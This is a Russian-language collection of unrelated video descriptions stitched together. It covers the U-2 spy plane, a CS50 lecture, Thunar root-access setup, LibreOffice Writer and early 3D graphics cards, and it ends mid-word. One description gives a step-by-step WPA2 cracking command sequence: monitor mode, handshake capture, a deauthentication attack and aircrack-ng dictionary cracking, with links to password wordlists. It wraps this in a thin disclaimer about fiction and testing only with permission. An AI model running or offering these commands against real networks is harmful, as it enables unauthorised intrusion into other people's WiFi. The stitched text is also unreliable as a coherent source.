Lockheed U-2 «Dragon Lady» — реактивный высотный разведывательный самолет, разработанный компанией Lockheed в 1950-хх.
Самолет был создан для выполнения наблюдательных полетов в любом регионе мира даже при условии активного противодействия ПВО. Основой его концепции является высотность полетов — более 70000 футов или 21 км, недостижимая для самолетов и артиллерии того времени. Самолет активно эксплуатировался силами ЦРУ и ВВС США до 1970-хх, а далее, ВВС США.
За весь приод экслпуатации U-2 принимал участие в, практически, всех военных операциях ВС США и спецвойск, а так же, проводил разведывательные миссии во всех регионах, включая СССР и КНР. В условиях гонки вооружений, силы ПВО, периодически, «догоняли» высотный разведчик и им удавалось его сбить. Наиболее известным таким случаем было сбитие U-2 с пилотом Фрэнсисом Гэри Пауэрсом в 1960 году. Однако, не смотря на все сложности и скандалы, U-2 продолжают службу до сих пор.
Это Хогвартс? Нет, друзья, это Гарвард и первая лекция (Week 0) легендарного курса по основам программирования CS50 с русским переводом.
Даже на этом вводном занятии (хотя мозг отказывается воспринимать это яркое интерактивное действо как «занятие») @David Malan уже успел рассказать и показать много интересного.
Вот о чем:
• родной язык компьютеров — двоичная система счисления
• ASCII — как записываются символы
• как алгоритмизировать задачи — на живых примерах. Очень живых=)
• почему Дэвид разорвал телефонный справочник или что такое двоичный поиск
• сложность алгоритма — что, как и почему
• о том, что такое циклы, расскажет никто иной, как Марк Цукерберг, основатель Facebook
• …а еще вы увидите его же в 2005 году, в качестве приглашенного гостя CS50. Хм… судя по аудитории, интерес к технологиям вырос в десятки раз!
Настраиваем автомонтирование разделов и добавляем строку в Thunar запуск от Root.
Автомонтирование разделов и Thunar от Root
Автомонтирование разделов.
Установить пакет
sudo apt-get install ntfs-3g ntfs-config
Необходимы для работы с разделами NTFS
Автомонтирование разделов настроить программой Диски.
Добавляем строку в Thunar запуск от Root
Если не установлена, то установить утилиту gksu — sudo apt install gksu
В Thunar кликаем Правка-Особые действия- (добавить)
1 для запуска самого Thunar от root во вкладке Основное Имя пишем —
Открыть каталог от администратора. Описание тоже — Открыть каталог с правами администратора
Команда gksu thunar %f
Во вкладке Условия появления отмечаем Каталоги
2 для редактирования конфигов во вкладке Основное Имя пишем —
Редактировать от администратора. Описание тоже — Редактировать от администратора.
Команда gksu gedit %f
Или вместо gedit (его нужно до установить) вписать любой другой текстовой редактор, по умолчанию в Дебиане это Mousepad.
Команда gksu mousepad %f
Во вкладке Условия появления отмечаем Текстовые файлы и Другие файлы.
Теперь через правую клавишу мыши можно открыть конфиг для правки с правами администратора.
● В этом ролике я покажу, что ни одну WiFi сеть нельзя считать защищенной. Так как проверка моей сети показала то, что доступ к сети может получить кто угодно. В этом ролике я покажу, как я это сделал.
● Это постановочный ролик, не имеющий никакого отношения к реальной жизни. Всё происходящее в ролике — выполнено используя средства монтажа. Всё происходящее в ролике — творческая выдумка автора. Все действия придуманы, а любые наименования ПО — вымышленны. Любые сходства с реальностью — не более чем случайность. В реальной же жизни, любые подобные действия строго запрещены! Исключением является цель проверки системы на безопасность, получив одобрение владельца сети.
● Снял продолжение: брутфорс со скоростью до 500 000 тыс паролей в секунду используя видеокарту: goo.gl/HbDh8i
● Порядок команд:
— ifconfig
— airmon-ng check kill
— airmon-ng start wlan0
— airodump-ng wlan0mon
— airodump-ng --bssid [MAC адрес точки доступа – без скобок!] --channel 1 -w wifi wlan0mon
— aireplay-ng --deauth 20 -a [MAC точки доступа] -c [MAC подключенного клиента] wlan0mon
— wpaclean ИмяНовогоФайла ИмяСтарогоФайла
— aircrack-ng -w [ПутьКСловарю] -b [MAC точки доступа] [ЧистыйХэндшейк .cap]
● Набор словарей:
— goo.gl/z7mnhf — Даты, использовать первым
— goo.gl/4BBPQy — Номера Телефонов RUS, использовать вторым
— goo.gl/bVsfo2 — Элитный словарь от InsidePRO
— goo.gl/Ab2fTE — Дополнительный словарь на 9 млн. слов
— ● В ролике "{100%} Как взломать любой WiFi? | WPA2 | Kali Linux | Как защититься от взлома? | UnderMind" — я рассказываю об информационной безопасности. И о реальной уязвимости всех сетей. Существует множество способов получения доступа к сети WiFi, в том числе социальная инженерия или уязвимости в WPS, но об этом как-нибудь в другой раз. И сейчас поговорим о самом надежном (на мой взгляд) методе, который сработает со 100% вероятностью.
● Сама проверка у нас подразделяется на 2 части. Первая: это захват хендшейка или рукопожатия. В понятии WiFi сетей это что-то вроде «Привет, чувак. Подключи меня», «Привет. Какой пароль?», «Пароль: Блаблабла». Мы прослушиваем эти данные, но поскольку пароль передается в зашифрованном виде, мы переходим ко второму этапу. А именно: к расшифровке хендшейка.
Всё делать мы будем на Kali Linux.
Первой командой смотрим интерфейс нашего WiFi адаптера
ifconfig
Выбираем тот, который отвечает за WiFi, это как правило самый последний.
Переводим наш WiFi адаптер в режим монитора. В этом режиме он будет ловить все пакеты WiFi, даже предназначенные другим устройствам. Делаем это командой:
Продолжение в ролике…
LibreOffice Writer это бесплатная и очень гибко настраиваемая программа для создания и редактирования текстовых документов с поддержкой таблиц, изображений, различного форматирования и мультимедиа. Это видео познакомит вас с LibreOffice Writer и поможет настроить программу для удобного использования. Рассматривается переключение между режимами интерфейса (классический, однострочный, вкладки, групповая лента, контекстный), настройка отображения документа, боковая панель, настройка панелей и размеров значков. Также показано, как сохранять документы в форматах Word (doc и docx).
Второе видео вокруг и около систем под процессоры с разъёмом Slot 1.
В этом видео я рассказываю про зарождение трёхмерной графики на ПК и о её аппаратном ускорении.
Начиная от 3Dfx Voodoo и заканчивая nVidia GeForce FX/ATI Radeon 9xxx.
Даты, техпроцессы, конвейеры, частоты и DirectXы.
Содержание:
01:34 — 3Dfx Voodoo Graphics (1996)
02:30 — nVidia Riva 128 (NV3, 1997)
02:47 — появление разъёма AGP
03:28 — ATI 3D Rage Pro (R3P, 1997)
04:22 — 3Dfx Voodoo2 (SST96, 1998)
06:46 — появление технологии SLI
09:01 — nVidia Riva TNT (NV4, 1998)
09:38 — ATI 3D Rage 128 GL (R4G, 1998)
12:00 — nVidia Riva TNT2 (NV5, 1999)
12:33 — 3Dfx Voodoo3 (Avenger, 1999)
13:26 — ATI Rage 128 Pro (R5, 1999)
14:44 — Transform